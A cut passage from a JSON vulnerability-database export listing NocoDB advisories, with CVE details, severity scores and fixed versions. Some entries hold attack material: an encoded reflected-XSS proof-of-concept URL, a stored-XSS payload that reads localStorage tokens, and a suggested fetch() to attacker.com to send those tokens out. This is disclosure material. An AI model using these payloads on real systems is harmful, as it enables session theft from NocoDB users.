`calendar-datas.service.ts`.\n\n### Impact\nIf the database is compromised, shared view passwords are immediately readable. Risk is limited to password reuse scenarios.\n\n### Credit\nThis issue was reported by [@Tulgaaaaaaaa](https://github.com/Tulgaaaaaaaa).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28360","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.14091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28360"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:01:13Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-mpp2-x7wv-38hv","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:01:13Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-mpp2-x7wv-38hv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28360","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28360"},{"reference_url":"https://github.com/advisories/GHSA-mpp2-x7wv-38hv","reference_id":"GHSA-mpp2-x7wv-38hv","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mpp2-x7wv-38hv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28360","GHSA-mpp2-x7wv-38hv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n449-xc5n-yuf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21346?format=json","vulnerability_id":"VCID-nbre-gc8b-73af","summary":"NocoDB Vulnerable to User Enumeration via Password Reset Endpoint\n### Summary\nThe password forgot endpoint returned different responses for registered and unregistered emails, allowing user enumeration.\n\n### Details\n`POST /api/v2/auth/password/forgot` returned a success message for registered emails but `'Your email has not been registered.'` for unknown emails. The fix returns a uniform response regardless of whether the email exists.\n\n### Impact\nAn unauthenticated attacker can determine whether an email is registered. No credentials or data are exposed.\n\n### Credit\nThis issue was reported by [@Tulgaaaaaaaa](https://github.com/Tulgaaaaaaaa).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28358","reference_id":"","reference_type":"","scores":[{"value":"0.00599","scoring_system":"epss","scoring_elements":"0.69751","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28358"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:02:18Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:02:18Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28358","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28358"},{"reference_url":"https://github.com/advisories/GHSA-387m-j3p9-3php","reference_id":"GHSA-387m-j3p9-3php","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-387m-j3p9-3php"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28358","GHSA-387m-j3p9-3php"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nbre-gc8b-73af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/34553?format=json","vulnerability_id":"VCID-p9mr-w1yp-mffa","summary":"nocodb SQL Injection vulnerability\n## Summary\n\nNocodb contains SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database.\n\n## Product\n\nnocodb/nocodb\n\n## Tested Version\n\n[0.109.2](https://github.com/nocodb/nocodb/releases/tag/0.109.2)\n\n## Details\n\n### SQL injection in `SqliteClient.ts` (`GHSL-2023-141`)\nBy supplying a specially crafted payload to the given below parameter and endpoint, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.\n\nThe [`triggerList`](https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654) method creates a SQL query using the user-controlled [`table_name`](https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637) parameter value from the [`tableCreate`](https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63) endpoint.\n\n```javascript\nasync triggerList(args: any = {}) {\n  const _func = this.triggerList.name;\n  const result = new Result();\n  log.api(`${_func}:args:`, args);\n\n  try {\n    args.databaseName = this.connectionConfig.connection.database;\n\n    const response = await this.sqlClient.raw(\n      `select *, name as trigger_name from sqlite_master where type = 'trigger' and tbl_name='${args.tn}';`,\n    );\n[...]\n```\n\n#### Impact\n\nThis issue may lead to `Information Disclosure`.\n\n## Credit\n\nThis issue was discovered and reported by GHSL team member [@sylwia-budzynska (Sylwia Budzynska)](https://github.com/sylwia-budzynska).\n\n\n## Disclosure Policy\n\nThis report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43794","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.5252","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43794"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63"},{"reference_url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654"},{"reference_url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3m5q-q39v-xf8f","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-13T15:57:00Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3m5q-q39v-xf8f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43794","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43794"},{"reference_url":"https://github.com/advisories/GHSA-3m5q-q39v-xf8f","reference_id":"GHSA-3m5q-q39v-xf8f","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3m5q-q39v-xf8f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66924?format=json","purl":"pkg:npm/nocodb@0.111.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.111.0"}],"aliases":["CVE-2023-43794","GHSA-3m5q-q39v-xf8f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p9mr-w1yp-mffa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/32656?format=json","vulnerability_id":"VCID-pes6-6f16-s7de","summary":"NocoDB Vulnerable to Reflected Cross-Site Scripting on Reset Password Page\n### Summary\n\nThe API endpoint related to the password reset function is vulnerable to Reflected Cross-Site-Scripting. \n\n### Details\n\nThroughout the source-code analysis, it has been found that the endpoint /api/v1/db/auth/password/reset/:tokenId is vulnerable to Reflected Cross-Site-Scripting.\n \nThe flaw occurs due to implementation of the client-side template engine ejs, specifically on file resetPassword.ts where the template is using the insecure function “<%-“ \nhttps://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/ui/auth/resetPassword.ts#L71  \nwhich is rendered by the function renderPasswordReset: \nhttps://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/auth.controller.ts#L251\n\n### PoC\n\nSend the request below to a vulnerable instance: \n`/api/v1/db/auth/password/reset/asdsad%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E/`\n\n![image](https://github.com/user-attachments/assets/28d8e7c6-efb9-49df-b049-56dab229d74f)\n\n### Impact\n\nThe vulnerability affect end-users, allowing an attacker to craft and send a malicious link to the victim which leads running script on their browser.\n\n### Credits\n[l34k3d](https://github.com/xL34K3D)\n[ottoboni](https://github.com/gabrielott)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27506","reference_id":"","reference_type":"","scores":[{"value":"0.03816","scoring_system":"epss","scoring_elements":"0.88306","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27506"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/auth.controller.ts#L251","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/auth.controller.ts#L251"},{"reference_url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/ui/auth/resetPassword.ts#L71","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/ui/auth/resetPassword.ts#L71"},{"reference_url":"https://github.com/nocodb/nocodb/commit/ea821edb133e621e26183ae65c8ff9ee5d6f2723","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/commit/ea821edb133e621e26183ae65c8ff9ee5d6f2723"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wf6c-hrhf-86cw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wf6c-hrhf-86cw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27506","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27506"},{"reference_url":"https://github.com/advisories/GHSA-wf6c-hrhf-86cw","reference_id":"GHSA-wf6c-hrhf-86cw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wf6c-hrhf-86cw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65100?format=json","purl":"pkg:npm/nocodb@0.258.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.258.0"}],"aliases":["CVE-2025-27506","GHSA-wf6c-hrhf-86cw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pes6-6f16-s7de"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15150?format=json","vulnerability_id":"VCID-tpc8-v7f5-73dg","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue\n### Summary\nA stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.\n\n### Details\nThe nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of \"urls\" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag <a> with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror=\"malicious javascripts\"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.\n\n### PoC\nStep 1: Attacker login the nocodb and creates a table with two fields, \"T\" and \"F\". The type of field \"T\" is \"SingleLineText\", and the type of the \"F\" is \"Fomula\" with the formula content {T}\nStep 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)\nStep 3: The attacker clicks the \"Share\" button and enables public viewing, then copies the shared link and sends it to the victims\nStep 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage\n\nThe attackers can use the fetch([http://attacker.com/?localStorage.getItem('nocodb-gui-v2')](http://attacker.com/?localStorage.getItem(%27nocodb-gui-v2%27))) to replace the alert and then steal the victims' credentials in their attacker.com website.\n\n### Impact\nStealing the credentials of NocoDB user that clicks the malicious link.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49781","reference_id":"","reference_type":"","scores":[{"value":"0.01372","scoring_system":"epss","scoring_elements":"0.80533","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49781"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-13T19:49:05Z/"}],"url":"https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-13T19:49:05Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49781","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49781"},{"reference_url":"https://github.com/advisories/GHSA-h6r4-xvw6-jc5h","reference_id":"GHSA-h6r4-xvw6-jc5h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h6r4-xvw6-jc5h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44510?format=json","purl":"pkg:npm/nocodb@0.202.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-q5wh-8at8-87d2"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.202.9"}],"aliases":["CVE-2023-49781","GHSA-h6r4-xvw6-jc5h"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tpc8-v7f5-73dg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21314?format=json","vulnerability_id":"VCID-vs5e-zmcs-8kam","summary":"NocoDB's Refresh Tokens Not Revoked on Password Reset\n### Summary\nThe password reset flow did not revoke existing refresh tokens, allowing an attacker with a previously stolen refresh token to continue minting valid JWTs after the victim resets their password.\n\n### Details\n`passwordReset()` in `users.service.ts` updated `token_version` (invalidating JWTs) but did not call `UserRefreshToken.deleteAllUserToken()`. The `refreshToken()` method only checked token existence, not `token_version`. Both `passwordChange()` and `signOut()` correctly deleted all refresh tokens.\n\n### Impact\nAn attacker who previously obtained a refresh token retains access after password reset until the token expires.\n\n### Credit\nThis issue was reported by [@bugbunny-research](https://github.com/bugbunny-research) 